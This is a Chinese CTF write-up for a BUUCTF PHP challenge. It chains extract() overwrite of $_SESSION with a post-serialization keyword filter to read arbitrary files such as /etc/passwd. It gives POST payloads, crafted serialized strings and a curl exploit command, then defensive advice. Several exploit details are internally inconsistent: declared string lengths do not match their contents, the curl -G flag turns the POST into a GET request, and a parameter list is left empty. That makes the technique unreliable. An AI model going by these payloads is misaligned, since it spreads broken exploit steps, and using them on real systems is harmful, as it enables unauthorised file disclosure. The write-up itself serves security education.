手把手复现BUUCTF安洵杯PHP题：利用extract与session覆盖实现任意文件读取

从源码泄露到文件读取：深度剖析PHP extract与session反序列化漏洞实战

在CTF竞赛和实际渗透测试中，PHP应用的漏洞利用往往需要组合多个看似无害的功能点。本文将从一个典型的BUUCTF安洵杯赛题入手，逐步拆解如何通过extract变量覆盖与session反序列化漏洞的巧妙结合，最终实现任意文件读取的全过程。不同于简单的漏洞复现教程，我们将从攻击者视角完整还原漏洞挖掘思路，特别适合想要深入理解PHP安全特性的Web安全初学者。

1. 环境搭建与初步信息收集

首先需要准备一个标准的PHP测试环境。推荐使用Docker快速部署：

docker run -d -p 8080:80 --name php-test -v "$PWD":/var/www/html php:7.4-apache

访问index.php?f=highlight_file获取源码是本题的第一个关键步骤。这种通过参数直接暴露源码的方式在实际中并不罕见，开发者常常为了方便调试而保留这类接口。获取到的源码显示几个重要特征：

• 使用extract($_POST)直接处理用户输入
• 存在自定义的filter函数处理序列化数据
• 通过file_get_contents读取文件内容

提示：在实际测试中，类似?f=highlight_file的接口可能被命名为?source、?debug等，信息收集阶段要尝试常见参数名。

2. 漏洞链关键点分析

2.1 extract函数的安全隐患

PHP的extract函数能将数组中的键值对转换为当前作用域的变量，这在本题中成为第一个突破口：

extract($_POST); // 允许通过POST请求覆盖任意变量

通过发送如下POST数据，我们可以直接操纵$_SESSION数组：

POST /index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded _SESSION[test]=hacked

这种设计使得攻击者可以干预session数据的原始结构，为后续操作奠定基础。

2.2 过滤函数与反序列化的微妙关系

题目中的filter函数看似只是简单的字符串替换：

function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); }

但当它作用于序列化字符串时，会产生意外的结构破坏。考虑以下session数据序列化后的结果：

a:2:{s:4:"user";s:5:"guest";s:10:"flagphp";s:3:"abc";}

经过过滤后，如果flagphp中的内容包含被过滤词，字符串长度标识s:3将与实际内容不匹配，导致反序列化解析异常。

2.3 文件读取的最终触发点

漏洞链的终点是file_get_contents调用：

$userinfo = unserialize($serialize_info); echo file_get_contents(base64_decode($userinfo['img']));

正常情况下img路径由服务端控制，但通过前两个漏洞点的组合，我们可以注入自定义的img值。

3. 漏洞利用的完整构造

3.1 利用extract覆盖session变量

首先构造特殊的session变量来破坏序列化结构：

_SESSION[flagphp]=";s:6:"mochu7";s:3:"img";s:20:"L2V0Yy9wYXNzd2Q=";}"

这段payload的关键在于：

• 分号闭合前一个键值对
• 插入新的键值对控制img字段
• 使用base64编码的目标文件路径（如/etc/passwd）

3.2 序列化结构的精妙破坏

原始session序列化后大致如下：

a:3:{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:7:"flagphp";s:49:";s:6:"mochu7";s:3:"img";s:16:"L2V0Yy9wYXNzd2Q=";}";}

经过filter处理后，如果flagphp值中包含被过滤词，会导致字符串长度计算错误，使得后续内容被解析为新的键值对。

3.3 完整的攻击流程演示

使用curl构造完整请求：

curl -X POST http://localhost:8080/index.php \ -d '_SESSION[flagphp]=;s:6:"mochu7";s:3:"img";s:20:"L2V0Yy9wYXNzd2Q=";}' \ -b 'PHPSESSID=test' \ -G --data-urlencode 'f=show_image'

关键参数说明：

4. 防御方案与最佳实践

4.1 安全编码建议

1. 避免危险函数组合使用

   • 禁用extract或严格限制其参数
   • 序列化前过滤而非序列化后过滤

2. Session处理改进方案

   // 安全的session处理示例 $allowed_keys = ['user', 'function']; $_SESSION = array_intersect_key($_SESSION, array_flip($allowed_keys));

3. 文件操作安全规范

   • 限制文件读取路径白名单
   • 验证文件内容类型

4.2 实际应用中的加固措施

对于无法立即修改的遗留系统，可以考虑以下临时方案：

# Nginx配置防止源码泄露 location ~* \.php$ { if ($arg_f ~* "highlight_file|phpinfo") { return 403; } # ...其他配置 }

在PHP配置层面建议：

• 设置session.serialize_handler = php_serialize
• 开启open_basedir限制文件访问范围

5. 漏洞利用的进阶思考

通过这个案例，我们可以延伸出几个重要的安全研究角度：

1. PHP类型混淆的可能性

   • 当序列化结构被破坏时，类型标识符可能被篡改
   • 研究s:、i:等类型标识的利用方式

2. 过滤函数的绕过技巧

   • 使用不可见字符或编码混淆
   • 利用替换产生的空位构造有效载荷

3. 其他危险函数组合

   // 其他需要警惕的函数组合 parse_str($_POST); unserialize($_COOKIE['data']);

在真实环境中，这类漏洞往往需要结合具体应用逻辑进行调整。建议在本地测试环境中尝试修改过滤词列表和session处理逻辑，观察payload需要如何相应调整才能保持有效。